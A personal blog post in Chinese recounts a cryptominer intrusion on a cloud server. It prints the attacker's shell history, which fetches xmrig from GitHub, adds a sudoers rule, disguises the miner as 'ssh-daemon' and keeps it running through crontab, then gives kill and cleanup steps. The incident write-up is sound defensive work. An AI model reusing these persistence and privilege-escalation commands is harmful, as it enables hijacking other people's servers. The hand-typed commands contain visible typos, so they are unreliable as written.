本人自己購買了一臺阿里雲伺服器來玩，晚上收到被挖礦機程式入侵，處理過程大概是這樣的使用top命令檢視看那些程序是陌生的並且佔用大量cpu，因為是挖礦機肯定會佔用很多cpu，先不要著急kill掉，因為一般都會重啟啟動的，我用history（也可以檢視～/.bash_history檔案）檢視歷史命令發現如下內容(我手敲的程式碼，可能有個別手誤，網頁端不能copy)，這個是入侵系統的指令碼，從中可以看出些端倪

yun install htop vim locate nano tmux git -y
apt-get intsall htop vim locate nano tmux git -y
git clone https://github.com/EVECloud/EVE_Miner_Tools
usermod -aG wheel cronjob
usermod -aG root cronjob
echo '%wheel' ALL=(ALL)    ALL' >> 'etc/suduers'
mkdir /opt
cd /opt
git clone https://githu.com/lotus1314/xmrig nginx-0.12
cd nginx-0.12
mv xmrig ssh-daemon
chomd +x ssh-daemon
rm -rf config.json
nano config.json
cat <(crontab -l) <(echo '****/bin/sh -c "/sbin/pidof ssh-daemon || nohup /opt/nginx-0.12/ssh-daemon &> /opt/nginx-0.12/log.txt $"') | crontab -
 

首先是安裝了一些挖礦需要的軟體，然後寫入到crontab 定時任務裡，這時候我們需要做的是先把定時任務裡的命令刪除掉

使用crontab -e 命令編輯檔案，把****/bin/sh -c "/sbin/pidof ssh-daemon || nohup /opt/nginx-0.12/ssh-daemon &> /opt/nginx-0.12/log.txt $"' 刪掉

然後使用如下命令 ssh-daemon替換為你top發現的那個異常程序名

ps -ef | grep ssh-daemon | grep -v grep | awk '{print $2}' | xargs kill -9
 

然後在刪除指令碼安裝的那些個程式。

我也不清楚它是通過那個系統漏洞入侵的系統，所以我的方案是防火牆禁止訪問github，以防它在此入侵破壞我的應用